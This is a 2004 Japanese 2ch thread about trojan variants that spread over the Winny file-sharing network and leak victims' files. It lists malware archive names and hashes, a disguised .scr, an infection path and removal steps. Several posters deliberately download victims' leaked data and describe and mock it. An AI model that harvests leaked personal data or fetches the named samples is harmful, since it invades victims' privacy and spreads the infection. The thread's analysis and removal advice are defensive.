97 :[名無し]さん(bin+cue).rar:04/11/06 19:08:40 ID:r0dNgQpH
>>88 >>94
ノートンは仙台に対応してるぞ
亜種は知らんがな

98 :[名無し]さん(bin+cue).rar:04/11/06 19:09:30 ID:XCzr5N2Q
なんか厨率高くなったな・・・

99 :[名無し]さん(bin+cue).rar:04/11/06 19:09:30 ID:afcim89U
>>95-96
わかったから流してくれ頼む

100 :[名無し]さん(bin+cue).rar:04/11/06 19:11:26 ID:5q3JpcQY
スンマソン

101 :[名無し]さん(bin+cue).rar:04/11/06 19:11:36 ID:r0dNgQpH
>>98
Tiで発表されたから厨が集まってきてるのだと思うぞ

102 :[名無し]さん(bin+cue).rar:04/11/06 19:14:00 ID:h9QmPZXW
[041106-0936][MUSIC][MAN][SHIP][私はポート0設定にしております][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

103 :[名無し]さん(bin+cue).rar:04/11/06 19:33:22 ID:zOd3GAYb
凄いひっかかるな

104 :[名無し]さん(bin+cue).rar:04/11/06 19:42:14 ID:sdtiaq3b
今のとこ
* [私には好きな人がいます]
* [私はポート0設定にしております]
の文字列を含む、仙台キンタマ亜種(の本体)は発見できてないんだよな
情報求む。                       解析好き

105 :[名無し]さん(bin+cue).rar:04/11/06 19:53:15 ID:XCzr5N2Q
推測ですまんが
[映画] 2004.10.30 いま、会いにゆきます - 竹内結子 中村獅童 武井証 美山加恋 浅利陽介.avi .scr 430,080 72320af4d1d043da271376b8435c471a
とかが流れてるが、これに嵌った人かなぁ?>[私には好きな人がいます]

106 :[名無し]さん(bin+cue).rar:04/11/06 19:53:49 ID:y5AvZXyO
Administratorまで流れ出したのが嫌だなあ。

107 :[名無し]さん(bin+cue).rar:04/11/06 19:57:53 ID:r0dNgQpH
>>104
前スレで特攻レポした者だが
本体は詰め合わせとかにパックされてるのか?

108 :[名無し]さん(bin+cue).rar:04/11/06 20:04:01 ID:gHUxZ1pV
>>104
同じく突撃してみたけど一向に。
あれ、何なんだろ?

109 :[名無し]さん(bin+cue).rar:04/11/06 20:13:36 ID:sZwrV08F
    ∩___∩  
    | ノ      ヽ  ??「クマー」・・・なぜ僕の名前が・・ 
   /  ●   ● |       
   |    ( _●_)  ミ     
  彡、   |∪|  、`\          
  / __ / ̄ ̄ ̄ ̄/ カタカタ・・・カタ・・・        
_(___)/  IBM  /_____     
     \/____/        

110 :[名無し]さん(bin+cue).rar:04/11/06 20:13:52 ID:r0dNgQpH
>>104
日付は1104以降だから亜種決定じゃないかなとりあえずダウンしてみるかな
てか、容量大きいとかあってスゲー怖いのですが...
PC死んだら笑ってくれ(;´д`)
λ............

111 :[名無し]さん(bin+cue).rar:04/11/06 20:17:39 ID:4FQ8W5fp
任しておけ。嘲笑は得意だ。
安心して玉砕して来い。

112 :[名無し]さん(bin+cue).rar:04/11/06 20:17:55 ID:7PgBGx3T
うちの学校で有名なオタク浅野と思われるss発見w

113 :[名無し]さん(bin+cue).rar:04/11/06 20:23:45 ID:r0dNgQpH
>>110だけど
なかなか落ちてこない
プツプツ切れる

114 :[名無し]さん(bin+cue).rar:04/11/06 20:30:19 ID:afcim89U
浅野さんWDT好きっぽいから許す。

115 :[名無し]さん(bin+cue).rar:04/11/06 20:40:00 ID:7CD9d0nr
ポート警告大杉になるよ・・・

116 :[名無し]さん(bin+cue).rar:04/11/06 20:45:54 ID:r0dNgQpH
ネトゲ呼ばれたし
なんか落ちてこないから特攻やめ、
他の人がんばれよー乙


117 :[名無し]さん(bin+cue).rar:04/11/06 20:46:34 ID:7CD9d0nr
しまつた・・・。

ファイル種別がスクリーンセーバになってるのを見たのに、
フォルダのアイコンと同じアイコンをダブルクリックしてしまっつた。

人間の条件反射とは恐ろしいものですね。
自分だけは騙されないと思ってても騙される。

せめて、Explorerの左のツリービューで開けば・・・。

#まぁいいや、VMwareの捨て環境だから、Undoすりゃいい。

118 :[名無し]さん(bin+cue).rar:04/11/06 21:16:00 ID:Xa6fVv56
アンドゥってなに?

119 :[名無し]さん(bin+cue).rar:04/11/06 21:24:00 ID:WJEMmFgB
アンドーナッツの略だろ。

120 :[名無し]さん(bin+cue).rar:04/11/06 21:24:14 ID:Afu6J+SN
仏語のかけ声、英語の「ワンツー」と同義

121 :[名無し]さん(bin+cue).rar:04/11/06 21:24:39 ID:EzceaHUA
いや、運動して心を落ち着けようってことだろ。

122 :[名無し]さん(bin+cue).rar:04/11/06 21:24:39 ID:afcim89U
むしろ遠藤のことだろ

123 :[名無し]さん(bin+cue).rar:04/11/06 21:26:36 ID:3sydfbOi
安藤じゃね?

124 :[名無し]さん(bin+cue).rar:04/11/06 21:27:36 ID:afcim89U
安藤だなw

125 :[名無し]さん(bin+cue).rar:04/11/06 21:28:43 ID:AIdflxjo
セキュリティ対策企業にとって重要なのは、
あくまで感染者数であり被害の度合いではない。
いくら個人情報晒したりHD全消ししたりしても、
それがちょっとしか感染しないんであれば対策するの面倒なだけ。

逆に、被害はほとんど無くても感染力がすごければ、
それだけたくさんのユーザーがセキュリティ製品を必要とするわけで、
こっちのほうがよっぽど対策のうまみがあるわけだ。

セキュリティーセキュリティーと叫んどいても、
対策企業は結局は金しか考えてないってことだよ。

126 :[名無し]さん(bin+cue).rar:04/11/06 21:30:01 ID:gHUxZ1pV
教育TVで安藤が滑ってるぞ。

127 :[名無し]さん(bin+cue).rar:04/11/06 21:30:49 ID:7CD9d0nr
お前ら楽しいなぁ。

ブラウザのCookieを根こそぎアーカイブするのは危険だなぁ。
さすがにクレジットカード番号は入ってないだろうけど・・・。

128 :[名無し]さん(bin+cue).rar:04/11/06 21:32:10 ID:snTLN3Tg
>>125
nyでエロゲDLしてマウントして感染
これはセキュリティ以前の問題だしな

129 :[名無し]さん(bin+cue).rar:04/11/06 21:35:52 ID:FQk98yNV
>104
前スレ終盤に貼られていた女性の名前集団の仙台ジェンキンス詰め合わせの中に入ってるよ。


130 :[名無し]さん(bin+cue).rar:04/11/06 21:36:36 ID:HNRjUKEe
>125
わざわざ長文書かなくていいから
フリーのアンチウィルスでも使っててください

131 :[名無し]さん(bin+cue).rar:04/11/06 21:37:12 ID:FQk98yNV
>129
ジェンキンスって何だ俺・・・。

132 :[名無し]さん(bin+cue).rar:04/11/06 21:37:44 ID:afcim89U
>>130
ていうか分かりきったこと書きすぎだよなw

133 :[名無し]さん(bin+cue).rar:04/11/06 21:42:59 ID:FQk98yNV
亜種見つけたよ。
マイドキュメントクリックすると発動だかんね。
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 絵理佳 [04-11-02](ファイル詰合せ).zip 379,709 83b3c0b8a94df1f5869a08c01420962b

134 :[名無し]さん(bin+cue).rar:04/11/06 21:45:23 ID:afcim89U
.srcの椰子か。アブいな。

135 :[名無し]さん(bin+cue).rar:04/11/06 21:45:34 ID:gHUxZ1pV
>>133
症状詳細きぼん。

136 :[名無し]さん(bin+cue).rar:04/11/06 21:45:59 ID:afcim89U
scrだし…。

137 :[名無し]さん(bin+cue).rar:04/11/06 21:50:21 ID:1r1PhBHh
335 名前:324[] 投稿日:04/11/06(土) 21:32:03 ID:WziLdPRU
少し調べてみた
違うかもしれないが[私には好きな人がいます]ウイルスのようです(この名前でいいのか?)

[年月日-時分][クラスタワード][クラスタワード][クラスタワード][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip
ってファイル名です。年月日時分とクラスタワードは作成日時とwinny環境によって違うと思う

ITmediaで>>1を紹介しているから逆に被害が拡大しそうな希ガス
ttp://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html

>>331
中身がなかったならよかったね
ただ、ほかの被害はなかったかな?


138 :[名無し]さん(bin+cue).rar:04/11/06 21:51:14 ID:afcim89U
ギャラ串のjpgが1000超えたw

139 :[名無し]さん(bin+cue).rar:04/11/06 21:51:15 ID:gHUxZ1pV
>>136
これ、UpFolder.txtにsystemy32\networkへの道筋をつけるだけで、
そこからが不明。
レジストリとかは無問題。 networkフォルダは空だし。

140 :[名無し]さん(bin+cue).rar:04/11/06 21:52:48 ID:RQUcIJir
素朴な疑問なんだが>>133さんが亜種を見つけたとの報告ですが
亜種が出るというのはウイルスが自動に作成するからですか?
それとも誰かが面白半分で手を加えるからですか?


141 :[名無し]さん(bin+cue).rar:04/11/06 21:55:16 ID:LY17JCrQ
ウイルスが亜種を自動作成したらdでもない事になるな。
さすがの先生も追いつけないぜ。

142 :[名無し]さん(bin+cue).rar:04/11/06 21:55:43 ID:aXQNfXWs
エロゲをマウント以外で感染した例って出てる?

143 :[名無し]さん(bin+cue).rar:04/11/06 21:57:42 ID:RQUcIJir
>>141
なるほど、ありがとうございます。知識が少し増えたよ!!

144 :[名無し]さん(bin+cue).rar:04/11/06 21:58:19 ID:FQk98yNV
>140
別に俺が見つけたわけじゃなくて報告はいくつかあがってたが
俺はおもしろ半分にジェンキンス覘こうとして>>17の時点でかかった。

仕様としてはtxtとかxlsとかjpgとかcokkieをハードディスク内から検索して。パックして
windows\system32にnetworkってフォルダこさえてUPフォルダに登録するくらいだと思う。

145 :[名無し]さん(bin+cue).rar:04/11/06 21:58:56 ID:FQk98yNV
だから俺、ジェンキンスじゃねぇって(2回目)orz

146 :[名無し]さん(bin+cue).rar:04/11/06 21:59:15 ID:VzKwBssX
naoのときは凄い速度だったのに今回は全然だな
もう本名とか電話番号くらいでは話題にならん。。。

147 :104:04/11/06 21:59:22 ID:sdtiaq3b
>>133
報告のは、昨夜のうちに解析済み→詳細不明ながらも推定無罪
バックドア仕掛けて何か送ってくるのかな?
仙台キンタマで、ポートサーチしてたのは、その前ふりか?
現在、地引継続中

>>140
亜種は本体を作ったやつが変種として作成、あるいは、誰かが手を加える
今のとこ、自動生成タイプは未発見
(そこまでのスキルがないのか?、必要性がないのか、あるいは自分が踏む危険性を考えてか)


148 :[名無し]さん(bin+cue).rar:04/11/06 22:08:15 ID:zOd3GAYb
壁紙をグロにするのとかでたら嫌だな・・

149 :[名無し]さん(bin+cue).rar:04/11/06 22:08:44 ID:sdtiaq3b
>>144のは
マイドキュメント フォルダ偽装の.scr(スクリーンセーバの拡張子、実行形式)
で、CRC32がD10645C6のヤツだよな? うちのテスト環境では発動しないけど、なんか条件あんのかな

150 :[名無し]さん(bin+cue).rar:04/11/06 22:09:39 ID:7PgBGx3T
>>148
あるじゃん既に。

151 :[名無し]さん(bin+cue).rar:04/11/06 22:10:36 ID:8LEetoNB
ノートンでウィルスチェックかけると、致命的エラーでスキャンできませんでした
といわれたんだが、こりゃウイルスにやられたんかな?

152 :[名無し]さん(bin+cue).rar:04/11/06 22:15:13 ID:JqtXAcLv
(・∀・)ニヤニヤ

153 :[名無し]さん(bin+cue).rar:04/11/06 22:16:47 ID:FfIcgycK
前スレより
623 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 04/11/04 01:42:23 ID:WaxmylIR
物凄く馬鹿な質問かもしれないけど、
Autorun切っておけばマウント→即ウィルス活動開始ってことはなくても、
そのエロゲなりなんなりをインスコしようとしたら、結局setup.exeを起動しなくちゃいけないわけで、
そうなるとAutorun切る意味っていったい何?
624 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 04/11/04 01:43:56 ID:j3xUYUqc
>>623
そのsetup.exeを検査する余裕があるでしょう

テンプレの対策をしている程度の知識しかないけど
setup.exeを検査するってのは難しい?


154 :[名無し]さん(bin+cue).rar:04/11/06 22:18:05 ID:Xa6fVv56
一番面白かったやしの情報キボン

155 :[名無し]さん(bin+cue).rar:04/11/06 22:18:58 ID:1r1PhBHh
>>137
に感染している奴のまとめファイルより

UpFolder.txt
[network]
Path=C:\WINDOWS\system32\network
Trip=

156 :[名無し]さん(bin+cue).rar:04/11/06 22:19:48 ID:7PgBGx3T
アンチウィルスソフトに任せれば。
対応してる奴には対応できるけど。

157 :[名無し]さん(bin+cue).rar:04/11/06 22:21:38 ID:WIcYGzme
安全が確認されてるのだけ落とせば一応は大丈夫

158 :[名無し]さん(bin+cue).rar:04/11/06 22:23:27 ID:7CD9d0nr
過去に猛威を振るったウィルスの単体をターゲットとした除去キットのReadme.txtがあってワロタ。
しかも、何種類も。

おまえさん、何度も感染してるのね・・・

159 :[名無し]さん(bin+cue).rar:04/11/06 22:24:05 ID:O0cEUoxc
犯罪やめればいいんだよw

個人情報晒されたあげく、
著作権団体から民事の損害賠償を
ウン百万ぐらい起こされて、親から勘当される奴とか出ないかな。
爆笑できるのに。

160 :[名無し]さん(bin+cue).rar:04/11/06 22:25:13 ID:gHUxZ1pV
>>155
ここまでは確認。
さらに、nyにつなげっ放しにしてあるんだけど進展なし。

161 :[名無し]さん(bin+cue).rar:04/11/06 22:26:42 ID:7PgBGx3T
>>159
落としたのがエロゲなら完璧だな。

162 :[名無し]さん(bin+cue).rar:04/11/06 22:27:39 ID:WIcYGzme
改めてエロの力は凄いと再認識したよ・・・

163 :[名無し]さん(bin+cue).rar:04/11/06 22:31:10 ID:sdtiaq3b
>>159
トロイ踏んで個人情報が漏れ、そこから手繰られた場合、犯罪行為の証拠となりえるかどうか?
という問題がある。ので、怪しいことしてる香具師はとりあえず踏んでおけ(w
民事の場合は特にそう。告訴する側がトロイ流してる謎団体の所業まで突き止めないとね。

いずれにしろ、漏れは好奇心で新型トロイの動向を知りたいだけなのだが
(そういう意味でnyは、いい漁場だな)

164 :[名無し]さん(bin+cue).rar:04/11/06 22:35:10 ID:nnwLjs86
エロのおかげでWindowsが大きくなったんじゃなかったっけ?

165 :[名無し]さん(bin+cue).rar:04/11/06 22:37:34 ID:FfIcgycK
とりあえずエロのおかげでビデオは普及したけっか

166 :[名無し]さん(bin+cue).rar:04/11/06 22:38:08 ID:Xa6fVv56
エロで大きくなるのは一箇所だけでいい

167 :[名無し]さん(bin+cue).rar:04/11/06 22:43:48 ID:aGcfH7fs
>>122
もまえのボケは高度だな

168 :[名無し]さん(bin+cue).rar:04/11/06 22:44:37 ID:7PgBGx3T
まぁエロのおかげで人類が繁栄したのは間違いないな。

169 :[名無し]さん(bin+cue).rar:04/11/06 22:44:44 ID:sdtiaq3b
エロ・エネルギーが推進したもの

VHS(ビデオ)、CD(VideoCD、CD-R)、DVD(DVD±R)、
IE(Webブラウザ)→Internet→Windows、しいてはPC全体
人類。

170 :[名無し]さん(bin+cue).rar:04/11/06 22:47:33 ID:LY17JCrQ
エロのお陰で性犯罪も耐えないけどな。
逆にエロのデメリットってこれだけか?

171 :[名無し]さん(bin+cue).rar:04/11/06 22:52:07 ID:1r1PhBHh
>>155
が何度も追加されていたので、ウィルスを実行するたびに、同じ処理が行われる模様

172 :[名無し]さん(bin+cue).rar:04/11/06 22:53:36 ID:S1bG28bz
エロが消えると、生物も絶える。
これは自然の摂理、絶対真理です。
エロ、これ全。

173 :[名無し]さん(bin+cue).rar:04/11/06 22:53:56 ID:7PgBGx3T
>>170
HIVとか。

174 :[名無し]さん(bin+cue).rar:04/11/06 22:55:53 ID:LY17JCrQ
>>173
性病があったか。

175 :[名無し]さん(bin+cue).rar:04/11/06 22:56:53 ID:EzceaHUA
>>172
「わたしはアルパであり、オメガである」と黙示録も語っています。

176 :[名無し]さん(bin+cue).rar:04/11/06 22:57:10 ID:QB9sJZ07
苺キンタもエロか

177 :[名無し]さん(bin+cue).rar:04/11/06 23:04:59 ID:8+w5JkMp
無視リスト推奨の.exe,,0,0,,0,1,0
の ,,0,0,,0,1,0 って何の数字なんですか?

178 :[名無し]さん(bin+cue).rar:04/11/06 23:05:38 ID:82RopPkL
>>177
顔文字

179 :[名無し]さん(bin+cue).rar:04/11/06 23:05:57 ID:eoXbSmPs
はた

180 :[名無し]さん(bin+cue).rar:04/11/06 23:07:35 ID:HNRjUKEe
>177
すれ違い


           (/´△`\) Winny総合質問27 Σ(´□`;)
     http://tmp4.2ch.net/test/read.cgi/download/1099292027/l50

181 :[名無し]さん(bin+cue).rar:04/11/06 23:10:57 ID:sdtiaq3b
[私には好きな人がいます]および[私はポート0設定にしております]
の本体を探すのに、少し方向性を変えてみた。晒されるクラスタワードは

[コブクロ][雪の降らない街(11.13発売の最新曲)(1).mp3][MUSIC][MAN][SHIP]
[mp3][三遊亭歌之介][TRICK2 #][041106-0320][【無修正】【裏ビデオ】産婦人〜略〜][(盗撮)]

どうやら、エロゲよりも音楽関係のファイルを落としてる香具師が多い雰囲気
そっち関連で地引継続

182 :[名無し]さん(bin+cue).rar:04/11/06 23:21:02 ID:puJjUq4a
とりあえずレジストリエディタが起動できたら感染してないって事ですかね?

183 :[名無し]さん(bin+cue).rar:04/11/06 23:23:01 ID:pK7Rpqyi
なんでnyにはウイルス多いのにMXとかは少ないんだ?

184 :[名無し]さん(bin+cue).rar:04/11/06 23:24:00 ID:82RopPkL
またタマツカが踏んでくれないかね

185 :[名無し]さん(bin+cue).rar:04/11/06 23:24:01 ID:LY17JCrQ
>>183
当たり前だろ。少し頭使えよ。

186 :[名無し]さん(bin+cue).rar:04/11/06 23:24:06 ID:29sz/cAY
http://homepage2.nifty.com/dragon-r/

ドラゴン・ロアー
BBSに親切に公表されてるよと報告したのに速攻で消しやがった。

http://www.angelfire.com/ex2/rag_sendai_kintama/
ここの1番下のヤツ。

187 :[名無し]さん(bin+cue).rar:04/11/06 23:27:38 ID:FQk98yNV
私には好きな人がいますの手前ってクラスタか?

188 :[名無し]さん(bin+cue).rar:04/11/06 23:42:42 ID:1icbVGm7
>>155
[私には好きな人がいます][仙台ギャラクシーエンジェルズ] zip,,100,200,,0

大物狙いで半日くらい地引かけて今のトコ3名。
・今年新卒入社と思われる奴→家族の旅行写真や自分の画像など。実害は低そう。
・エロゲーでワレザーの痛い奴→eS-booksの注文表で本名ばれてる。エロゲーマニア
 と知られて構わないなら実害は低そう。
・九州の自営家具屋(?)→仕事のPCでnyなんかやるな!本人や家族の情報は自業自得だが
 施工した顧客の情報が100以上も一部現場画像付きで流出。これが一番ヤバイと思われ。

189 :[名無し]さん(bin+cue).rar:04/11/06 23:50:30 ID:sdtiaq3b
[私はポート0設定にしております]で、大量の家族写真を含むのを地引
写真好きのスキルの低いおっさんだと思われるが、nyなんかやるなよ(w

そういやポート0を蹴ってるんだった、とりあえず取り込んどこう
(ちなみに、ny本体にも手を入れた観測用システムなので、検索能力は低いんだが)

190 :[名無し]さん(bin+cue).rar:04/11/06 23:53:16 ID:Afu6J+SN
今回のもユーザの脆弱性を巧みに突いたって事だな
つか踏んだ香具師大杉w

ところで「エロの前には辛抱堪らん」てのは人類最大のセキュリティホールだよなぁ
意図的に設置されたバックドアかもしれんが

191 :[名無し]さん(bin+cue).rar:04/11/07 00:01:35 ID:L/CrJAeA
健児ときょうこは兄弟ですか?恋人ですか?

192 :[名無し]さん(bin+cue).rar:04/11/07 00:06:22 ID:HbuXIo/a
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] セイミ [04-11-02](ファイル詰合せ).zip

ウイルスしか入ってないよ

193 :[名無し]さん(bin+cue).rar:04/11/07 00:07:13 ID:YP1G92ll
>>182
本体ではなく、それが撒き散らすzip内のscrを踏んでみたけど、
regedit.exeもregedt32.exeもちゃんと起動したよ。

ウィルス本体と、それが撒き散らすのは、中身が違うのかな・・・。

194 :[名無し]さん(bin+cue).rar:04/11/07 00:08:04 ID:FajhENk7
面白半分で仙台ギャラファイル見ようとしたら.scr偽装の亜種だった。不覚だ…
でも俺の環境ではなぜか発動しなかったぽい。
即効で削除しようとしたがなぜかマイドキュメントが絡んでて削除できなかったので、
タスクマネージャでマイドキュメントを終了させて削除した。

195 :[名無し]さん(bin+cue).rar:04/11/07 00:08:45 ID:vKbhGWDe
マイドキュメント.scr 入ってるのは捏造と思ってた

196 :[名無し]さん(bin+cue).rar:04/11/07 00:09:26 ID:HbuXIo/a
面白全部だろうが

197 :[名無し]さん(bin+cue).rar:04/11/07 00:16:12 ID:JmckvyJU
キンタマも苺キンタマも >>194のように2次感染したマヌケなヤツが結構いた

198 :[名無し]さん(bin+cue).rar:04/11/07 00:20:05 ID:Q7BSzLSG
普通に寸止めだった。あびねぇ

199 :[名無し]さん(bin+cue).rar:04/11/07 00:30:41 ID:0+qIFiph
だからよ、面白半分で落とすなよ。

nyやってて感染した馬鹿は自業自得だが、そいつに巻き込まれる罪の無い人間もいるわけだろ?
九州の家具屋の顧客みたいに。
お前らが落とすことによってお前らのPCからまたばら撒かれるじゃねぇか。

落としたらキャッシュ消せ。

200 :[名無し]さん(bin+cue).rar:04/11/07 00:35:31 ID:YP1G92ll
黒木さんの犬(大きいほう)の写真、かわいかったー。

人間は正直見ちゃいけないと思った。プライベートだからね。

201 :[名無し]さん(bin+cue).rar:04/11/07 00:36:38 ID:9sXqQzfd
そんなもん顧客がその会社を見る目が無かっただけで、自業自得だろうがボケ。
だいたいダウソ板で善人ぶるやつはウゼーんだよ

202 :194:04/11/07 00:41:06 ID:FajhENk7
俺の場合、マイドキュメントのファイル名を変えていたのが効をそうしたらしい。
これまでに挙がっているチェック項目はすべてシロだった。

203 :[名無し]さん(bin+cue).rar:04/11/07 00:41:27 ID:HbuXIo/a
>>201
omae ga uzai

204 :194:04/11/07 00:56:19 ID:FajhENk7
追記
ルートディレクトリに怪しげなVBS何たらが生成されてたので削除した。

205 :[名無し]さん(bin+cue).rar:04/11/07 00:59:46 ID:kCpZhge0
総合質問スレとり誘導されてきました。

キャッシュのチェックをしたら
仙台 ギャラクシーエンジェル 俺のデスクトップ 〜(自分の名前)
みたいな名前のファイルが大量にあって、
今まで無かったUpフォルダがあったのですが、
これは>>8にあるウイルスの一種なのでしょうか。

winnyのフォルダを開いてもUpフォルダは無いし、
画面上出ているUPフォルダもキャッシュにあったら奴も全部削除したんですが
これで解決しましたかね?
あといつウイルスにかかったかも検討つかないんですが。

またファイル名を指定して実行→c:\windows\win.ini
をしたところ英文字の羅列は出ましたが「ぬるぽ」とは入っていませんでした、

206 :[名無し]さん(bin+cue).rar:04/11/07 01:01:43 ID:B869FF7e
ドラゴンロアーは今何やってるんだろうw

207 :[名無し]さん(bin+cue).rar:04/11/07 01:07:24 ID:Bl7uhMAe
>>205
>>38

208 :[名無し]さん(bin+cue).rar:04/11/07 01:07:35 ID:DLnLpLzH
>>205
誘導されてきたのなら、ここは質問スレではなく
自己学習スレだと見当が付いただろ? 前スレなり、1から嫁

209 :[名無し]さん(bin+cue).rar:04/11/07 01:18:58 ID:kCpZhge0
すんません。あんまり詳しく無いんですが、
とりあえずコレやっとけば大丈夫っての無いですか?
OSの再インストールは共有PCなもんで辛いのですが。

210 :[名無し]さん(bin+cue).rar:04/11/07 01:21:55 ID:lI2YtQWa
とりあえずnyは終了させておけばこれ以上広がらないと思うが、
もう広まったファイルは永遠にnyネットワークに流れたままだろう。
対策は>1から読めば分かる

211 :[名無し]さん(bin+cue).rar:04/11/07 01:22:03 ID:HTbc3aTD
>>209
共有PCでなに割れエロゲで遊んでんじゃ

212 :[名無し]さん(bin+cue).rar:04/11/07 01:23:00 ID:SjVLYkk0
共有PCでNYをやるのも大間違い

213 :[名無し]さん(bin+cue).rar:04/11/07 01:23:19 ID:BTbMzTQp
>>209
ワクチンソフトが対応するまで待ってから駆除。
「とりあえずこれ」って程度でどうにかなるなら、こんなに
騒いだりしないよ。共有PCでnyなんてもってのほかだし。

214 :194:04/11/07 01:24:32 ID:FajhENk7
いやー肝を冷やしたよ。
scrファイルをダブルクリックしちゃったから感染してもおかしくない状況だったのに。
もっともスクリーンセーバ型はそんなに悪質じゃないみたいだけど。

215 :[名無し]さん(bin+cue).rar:04/11/07 01:26:32 ID:lI2YtQWa
え?ぶっちゃけ スクリーンセーバ型の亜種の方が悪質だぜ?



216 :[名無し]さん(bin+cue).rar:04/11/07 01:29:16 ID:FajhENk7
>>215
そう?
>>10見る限りたいしたことないようにおもうんだけど。

217 :[名無し]さん(bin+cue).rar:04/11/07 01:31:52 ID:e6oasC3d
>>209
とりあえずコレ=再インスコ
最強


>>214
キンタマの時も「ごみ箱.exe」踏んでも何ともねーってふんぞり返ってた香具師居たよな
時限機能発動後に大慌てしてたみたいだけど

218 :209:04/11/07 01:34:06 ID:kCpZhge0
なんだかんだで暖かい対応サンクスですw
ひとまずnyと別れる良い機会だと思ってみます。

ウイルスかかるなんて人事だと思ってたんだがなぁ orz

>>38にある駆除方法の一番上は分かるんですが
下三つの
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。

というの誰かご教授きぼん。暇な時で良いんで。
ny切っておけば問題は無いのでしょうが。

219 :[名無し]さん(bin+cue).rar:04/11/07 01:35:55 ID:lI2YtQWa
948 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/11/06(土) 09:33:20 ID:sdtiaq3b
[日付-時間][***][***][***][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

この手のの中身は、.txt .doc .xls .jpgをディスクの中からサーチして
片っ端からパックして流すタイプらしい。割と新しい亜種だと思われ…

かなり危険だなぁ。こりゃ。.jpgの中には破滅画像が含まれてる
(自分で自分自身のナニを撮影したと思われるマヌケな写真)
しかも、メール送受信キャッシュ(.txt)も含まれてるし…個人情報垂れ流し
感染者は…ご愁傷様


スクリーンセーバーの拡張子の便乗亜種はこれな>>216
>>10じゃなくて


220 :[名無し]さん(bin+cue).rar:04/11/07 01:36:19 ID:46SsnBPq
仙台ウイルスのスクショ集めにこってるの俺だけですか?ぐひひ

221 :[名無し]さん(bin+cue).rar:04/11/07 01:37:14 ID:FajhENk7
とりあえずうpゼロにしときゃいいんだろ?

222 :[名無し]さん(bin+cue).rar:04/11/07 01:37:34 ID:K58NQVmc
>>218
ケーブル引っこ抜くといいと思うよ

223 :[名無し]さん(bin+cue).rar:04/11/07 01:43:31 ID:YP1G92ll
いったいどうして踏んでしまうのだろう。

Cookieについてる名前から明らかに女性なのに、エロゲ?
いや、エロゲやる女の子はいるけどさ・・・。

224 :[名無し]さん(bin+cue).rar:04/11/07 01:45:18 ID:Q7BSzLSG
>>223
手口が巧妙だからなぁ…
オートランだし、まぁ仕方ないと言えば仕方ないけど、
女がエロゲやるのにWinnyって激しいなw

225 :[名無し]さん(bin+cue).rar:04/11/07 01:45:24 ID:riUBtazw
ウイルススキャンするだけの奴とか、既出の対策しただけで平気だと思ってる奴ってめでたいな。
対応してなかったらスキャン意味ないし、プロが考えたわけでもない対策しただけで
なんで平気だと思えるんだろうね。

>>218>>221
取りあえずお前らの個人情報が漏れたとだけ言っておくよ。
残念でした。
うp0でもうpしますから。

>>223
上にも出てるけど音楽関係だと思われ。

226 :[名無し]さん(bin+cue).rar:04/11/07 01:49:56 ID:DLnLpLzH
>>219
その前スレの948は漏れなんだが、一部修正
メール送受信キャッシュ(.txt)というより、主にCookieだな
とにかく全サーチかけてるっぽいので、負荷がかかればすぐに判明しそうなんだが

スクリーンセーバ拡張子の便乗型では、上記症状が発動しない(少なくとも俺は未確認)ってのと
その便乗型の内部コードさらっても[私には好きな…]とか[私はポート0設定…]の
文字列はヒットしないんだよ。ということで別物だと思う。今、本体を探してるんだけどね。

227 :[名無し]さん(bin+cue).rar:04/11/07 01:50:11 ID:wQwmiXH/
とりあえずオートラン切ってマウントからスキャンにかけて、
setup実行前に最低でもレジストリのバックアップくらいとっておけば
あとは何とかなるだろ、キンタマや苺や仙台ならの話だが。

228 :[名無し]さん(bin+cue).rar:04/11/07 01:50:47 ID:kCpZhge0
windows\system32の中のsvchost32.exeって奴を消そうとすると
フォルダの削除エラーと出て削除できないんですが。。。

229 :[名無し]さん(bin+cue).rar:04/11/07 01:51:29 ID:FajhENk7
>>225
upfolderが生成されてないのになんでうpされるんだよ。
そもそもwinnyフォルダにupfolder.txt自体ねーよ。

230 :[名無し]さん(bin+cue).rar:04/11/07 01:56:17 ID:b97gWzEA
Upfolderなんか無くとも、キャッシュファイル化できてればUPできるよな

231 :[名無し]さん(bin+cue).rar:04/11/07 01:58:08 ID:FajhENk7
キャッシュもとっくに調べたよ。
お前らあんまり脅かすなよなw

232 :[名無し]さん(bin+cue).rar:04/11/07 02:01:52 ID:DLnLpLzH
>>231
流した後にキャッシュ消すタイプならどうする。つか、あきらめれ

233 :[名無し]さん(bin+cue).rar:04/11/07 02:04:06 ID:OJyKEnpQ
開き直ったままの方が楽しくていいじゃない

234 :[名無し]さん(bin+cue).rar:04/11/07 02:04:37 ID:1Bx1IOtk
まあいいじゃないか。好きなだけエロゲできるんだから個人情報くらい。
やふーで流されても500円だぜ。コンチェルトしか買えねぇ。

235 :[名無し]さん(bin+cue).rar:04/11/07 02:07:40 ID:DLnLpLzH
今気付いたけど、いやなIDだな DLにLZHかよ

236 :[名無し]さん(bin+cue).rar:04/11/07 02:08:36 ID:riUBtazw
>>231
そう思ってればいいじゃん。
スキャンして反応あればいいけど反応なければ
新しい亜種って事なんだから何があるかわからないし。
やっぱこーゆー奴が感染するんだなぁ。
>>229みたいなレスするくらいだもんな。
まぁ、元々.scr偽装なんかに引っかかるアホだからしょうがないのか。

237 :[名無し]さん(bin+cue).rar:04/11/07 02:08:51 ID:FajhENk7
個人情報をキャッシュ化してからうpするウイルスなんて存在しねーだろうが。
なめんなよ!

238 :[名無し]さん(bin+cue).rar:04/11/07 02:09:15 ID:1pEL0RN5
噂聞いてdown板にやってきたがキンタマの時ほど全然大騒ぎになってないじゃん。
みんな対策ばっちりでこの程度のウィルスにはやられなくなってるのかな?
やっぱフォルダ偽装ってのがポイントだったのか。
しかし、焙煎スレはツワモノ多いよなぁ、逮捕者出ようが、ウィルスが広まろうが、
そんな話は微塵も出ずにエロの話に終始してるもんなぁ。廃人達の集まりにしか
思えん。

239 :[名無し]さん(bin+cue).rar:04/11/07 02:11:31 ID:BTbMzTQp
>>237
